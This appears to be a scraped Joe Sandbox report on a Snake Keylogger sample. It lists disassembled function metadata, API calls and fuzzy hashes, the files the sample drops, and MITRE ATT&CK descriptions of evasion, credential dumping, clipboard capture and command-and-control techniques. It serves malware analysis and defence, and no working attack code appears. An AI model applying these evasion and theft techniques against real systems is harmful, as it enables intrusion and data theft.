Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 46abf127b461966594539b2cb00e82417843b13178a7bdfc66a6853df7de0eec
Instruction ID: 40ca5798c6d3b59526a1ee34621216737133408fbccdd52925800404f238639f
Opcode Fuzzy Hash: 46abf127b461966594539b2cb00e82417843b13178a7bdfc66a6853df7de0eec
Instruction Fuzzy Hash: A3F0EC72A04518AFDB01DBE4DE88CEEB7BCEB48301B14047AF641F61A0CA749D519B78

Function 00401C1F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7

Strings

!, xrefs: 00401C5B

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
Instruction ID: 994eb4c646dc30d4db2129160ed463076ae6c8af372a05c6722ea4476ca57ad0
Opcode Fuzzy Hash: 9583f5a57c3a775296e031cb14509230db2970ced6148bfab5cafbeadf370f61
Instruction Fuzzy Hash: 8E21C371948209AEEF049FB5DE4AABE7BB4EF84304F14443EF605B61D0D7B889409B28

Function 00402D44 Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
Instruction ID: 673fb129a4d8ab743942914098bbacbd975ea3c1b6875aa08396d434171036d0
Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
Instruction Fuzzy Hash: C7116A32500108FBDF02AB90CE09FEE7B7DAF54340F100076B905B51E0EBB59E21AB58

Function 00402E79 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,00000000,00403059,?,?,?,?,?), ref: 00402E8C
GetTickCount.KERNEL32 ref: 00402EAA
CreateDialogParamW.USER32(?,00000000,00402DF3,00000000), ref: 00402EC7
ShowWindow.USER32(00000000,?,?,?,?,?), ref: 00402ED5

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
Instruction ID: aa51e3e4afe09322c41c699d4a644ad1219c84700ea5711a82ba7ac080bff55b
Opcode Fuzzy Hash: e645c8c421be7eabc5c3352734f208b7209d36df5043eda8f294b58fcdf419c5
Instruction Fuzzy Hash: EFF0DA30545720EFC7616B60FE0CA9B7B65BB04B11741497EF449F12A4DBB94891CAAC

Function 00405260 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 0040528F
CallWindowProcW.USER32(?,?,?,?), ref: 004052E0

Part of subcall function 00404247: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404259

Strings

, xrefs: 00405270

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
Instruction ID: 4f709491620671f980d9c6db17d5b9619efa9f8d8c8bffacc159c43cff332a87
Opcode Fuzzy Hash: 658d549574eddfd40241b3641b5f57dbd5b689929234e885e7ca98b3be3bb27d
Instruction Fuzzy Hash: 20019E7120060CAFDB319F40ED80A9B3B26EF90715F60007AFA00B52D1C73A9C529F69

Function 0040586D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,004266F0,Error launching installer), ref: 00405896
CloseHandle.KERNEL32(?), ref: 004058A3

Strings

Error launching installer, xrefs: 00405880

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
Instruction ID: 38a1dae354cb2a4c5fc32891eb37452fbeb174cf60b6e0268020382365bb363f
Opcode Fuzzy Hash: 7638236436ef790ce86ec485bfd7c6daeab9176ea3d70cd1a4e3ce55c648647a
Instruction Fuzzy Hash: FFE0BFB560020ABFFB10AF64ED05F7B7AACFB14704F414535BD51F2150D7B898158A78

Function 00406DC3 Relevance: 5.2, APIs: 4, Instructions: 236COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
Instruction ID: 28e39518df3801c38e3280a2e83f64e055c3b15caa2ea9a1a3761292ca1e3da9
Opcode Fuzzy Hash: 2379a6b80c2bc0c9d89d3ff48ecf146a73f88eb31b703b146685e5d0c657cb03
Instruction Fuzzy Hash: F9A15371E04229CBDB28CFA8C8547ADBBB1FF44305F10816ED456BB281C7786A86DF45

Function 00406FC4 Relevance: 5.2, APIs: 4, Instructions: 208COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
Instruction ID: 90999bc76b255a60827136b2fd47affe8781ac3d45706895e3c6f95813f0c94e
Opcode Fuzzy Hash: a97e96a70b1528884494d5a2455c9c9c8bf64013d0c9d0d58a0b179d1d34f865
Instruction Fuzzy Hash: 21913F71D04229CBDB28CF98C8547ADBBB1FF44305F14816ED456BB291C378AA86DF45

Function 00406CDA Relevance: 5.2, APIs: 4, Instructions: 205COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
Instruction ID: 7ab5a6fdb7118453f5bc4abdeeb58a7f0a93ca16cb9ae78d5f3cb9c6a39904d0
Opcode Fuzzy Hash: 526acb6b229722c101271a282f82fa7e8491aea9f4c983caca1afef0c2905762
Instruction Fuzzy Hash: 8E814471E04229DBDF24CFA8C8447ADBBB1FF44301F24816AD456BB291C778AA86DF15

Function 00406C2D Relevance: 5.2, APIs: 4, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
Instruction ID: dacb8e277fcbb3a33cac5efaa2c5173e23fd2fcd6bf81bdfe6f06a7534410a90
Opcode Fuzzy Hash: 133937f1df7ceb29c30f38c33f45990f246052236d4704b56955204b6cd885fa
Instruction Fuzzy Hash: 6C714371E04229CBDF24CF98C8447ADBBB1FF44305F14806AD446BB281C738AA86DF04

Function 00406D4B Relevance: 5.2, APIs: 4, Instructions: 170COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.2595610859.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.2595594265.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595631062.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595650045.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.2595678936.000000000045D000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Bivejens.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
Instruction ID: 610106becc8cf73b6091924598cab7a4a25495cbbf2bb893dbe28c15679d0a85
Opcode Fuzzy Hash: 0a10928d7685989459388dead70c60bd1e808e0421cae42356cd2ce25e8ee986
Instruction Fuzzy Hash: 5C714271E04229CBDB28CF98C844BADBBB1FF44301F14816AD456BB291C738A986DF45

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report TjoY7n65om.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Cryptography

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Temp\Bivejens.exe

C:\Users\user\AppData\Local\Temp\Bivejens.exe:Zone.Identifier

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2ifjr5aq.2cj.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4kb0ozyj.bqh.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gxjsehf.rqv.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iyvzv1r3.exc.ps1

C:\Users\user\AppData\Local\Temp\depersonaliseredes\Ceylonteer.kae

C:\Users\user\AppData\Local\Temp\depersonaliseredes\Fleece.kar

C:\Users\user\AppData\Local\Temp\depersonaliseredes\Halvbuernes.sve

C:\Users\user\AppData\Local\Temp\depersonaliseredes\Thalamiflorous.Tus209

C:\Users\user\AppData\Local\Temp\depersonaliseredes\montricens.fus

Windows Analysis Report
TjoY7n65om.exe

Function 00403359 Relevance: 86.2, APIs: 32, Strings: 17, Instructions: 410
stringfilecomCOMMON

Function 0040542B Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 284
windowclipboardmemoryCOMMON

Function 0040698E Relevance: 5.4, APIs: 4, Instructions: 382
COMMON

Function 00403D22 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346
windowstringCOMMON

Function 00403974 Relevance: 47.5, APIs: 13, Strings: 14, Instructions: 215
stringregistryCOMMON

Function 00402EDD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 182
COMMON

Function 004062A6 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 209
stringCOMMON

Function 0040176F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 145
stringtimeCOMMON

Function 004052EC Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72
stringwindowCOMMON

Function 004065EE Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36
libraryCOMMON

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine or network device. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer or network device via Network Device CLI (e.g. `reload` ).
Tactics:	Impact
Data Sources:	Command: Command Execution, Process: Process Creation, Sensor Health: Host Status
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre